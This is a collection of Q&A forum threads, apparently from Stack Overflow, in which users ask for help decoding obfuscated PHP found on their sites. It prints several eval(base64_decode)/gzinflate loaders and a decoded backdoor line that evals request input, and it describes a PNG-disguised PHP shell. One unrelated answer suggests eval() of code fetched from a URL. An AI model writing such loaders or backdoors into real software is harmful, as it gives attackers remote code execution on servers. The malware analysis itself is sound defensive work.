I just came across a PHP script that seems to be compressed. I couldn't seem to find any tool online to decompress it. I'm not sure if I'm using the right term. Can someone shed me some light?
The script looks something like this:
<?php eval(gzinflate(base64_decode('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'))); ?>
you can decode it using below urls:
1) http://www.tareeinternet.com/scripts/decrypt.php
2) http://ddecode.com/phpdecoder/
3) http://toolki.com/en/php-decoder/
4) http://www.unphp.net/
There really isn't a way to "un-minify" i think - especially when all of the variables and functions are reduced to numbers.
Related
I want to extract variable lengths of information from a jpeg-file using PHP, but it is not exif-data.
If I open the jpeg with a simple text editor, I can see that the wanted informations are at the end of the file and seperated by \00.
Like this:
\00DATA\00DATA00DATA\00DATA\000\00DATA
Now if I use PHP's file_get_contents() to load the file into a string, the dividers \00 are gone and other symbols show up.
Like so:
ÿëžDATADATADATADATADATA ÿÙ
Could somebody please eplain:
Why do the \00 dividers vanish?
How to get the informations using PHP?
EDIT
The question is solved, but for those seeking a smarter solution, here is the file I try to obtain the DATA parts from: https://www.dropbox.com/s/5cwnlh2kadvi6f7/test-img.jpg?dl=0 (yes I know its corrupted)
Use instead $data = exif_read_data("PATH/some.jpg") it will give you all headers data about image, you can check its manual here - http://php.net/manual/en/function.exif-read-data.php
I came up with a solution on my own. May not be pretty, but works for me.
Using urlencode(file_get_contents()) I was able to retrieve the \00 parts as %00.
So now it reads like this:
%00DATA%00DATA%00DATA%00DATA%000%00DATA
I can split the string at the %00 parts.
I am going to accept this answer, once SO lets me do so and nobody comes up with a better solution.
I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.
It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...
I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
In all my playing I managed to extract the following with a php script:
eval(gzinflate(base64_decode(strrev($zAkSoSavjFOn))));
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)
The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.
I have a website where users can upload files to share with others. But first I need to verify them.
Lately someone uploaded a .php file with the following commands:
‰PNG
<?php
eval(gzinflate(base64_decode("very large strings of characters")));
?>
I figured it might be harmful, so I didnt open it.
Does anyone have any idea what it does?
nobody can tell you, just do
<?php echo gzinflate(base64_decode("very large strings of characters")) ?>
to see what it would do....
edit: well now that you've posted the whole string i decoded it and pasted it here
Seems like the attacker's code was base64 encoded and gzipped.
So first the code is decoded from base64 encoding, and then it is unzipped basically until a string of code.
And then eval is called on the resulting string, which will execute the code that has been decoded and unzipped.
But without seeing what code gets generated, it is hard to say what it will do when the code is run.
I decoded the encoded text. Using the following approach
(I guess writing to file was a bad idea now that I think of it. Mainly if you're on Windows. I guess it is a bit safer on Linux with the execute bit turned off. So I was kind of lucky in this case!)
<?php
$test = gzinflate(base64_decode("encoded_text"));
$myFile = "testFile.txt";
$fh = fopen($myFile, 'w');
fwrite($fh, $test);
fclose($fh);
I wrote the output to file just in case there was some random html or javascript that could infect my computer if I just echoed it to my browser. That may be why you got an anti-virus warning.
I'm not sure what it does yet.
Just skimming through the code, which is like 4,750 lines of code, it seems like it sets up Basic Auth. And then there's a lot of database functions and some basic html interface. This in PHP. There's also some perl too. Near the end.
Basically what it seems to do is this: Every page where that image is displayed it will output parts of that code and execute it along with your code, and it will try to get input data, or try to find session data and or database values.
Then other parts of the code basically create an admin interface when the url is visited like this: url?admin=1, which brings up a Basic Auth authentication. And then there is an simple interface phpmyadmin like interface where the user can try out different queries and gather out metadata about your db. Probably other stuff run to exec, etc too.
I could be wrong, but that's the gist I get from going through the code.
The code is fine the only thing you need to take care is the long string that is encrypted
< ?php eval(gzinflate(base64_decode("very large strings of characters")));
for the reference of this kind of the statement you can refer to
http://php.net/manual/en/function.gzinflate.php
I want to create a PHP script that grabs the content of a website. So let's say it grabs all the source code for that website and I say which lines of code I need.
Is there a function in PHP that allows you too do this or is it impossible?
Disclaimer: I'm not going to use this for any illegal purposes at all and not asking you too write any code, just tell me if its possible and if you can how I'd go about doing it. Also I'm just asking in general, not for any specific reason. Thanks! :)
file('http://the.url.com') returns an array of lines from a url.
so for the 24th line do this:
$lines = file('http://www.whatever.com');
echo $lines[23];
This sounds like a horrible idea, but here we go:
Use file_get_contents() to get the file. You cannot get the source if the web server first processes it, so you may need to use an extension like .txt. Unless you password protect the file, obviously anybody can get it.
Use explode() with the \n delimiter to split the source code into lines.
Use array_slice() to get the lines you need.
eval() the code.
Note: if you just want the HTML output, then ignore the bit about the source in step 1 and obviously you can skip the whole eval() thing.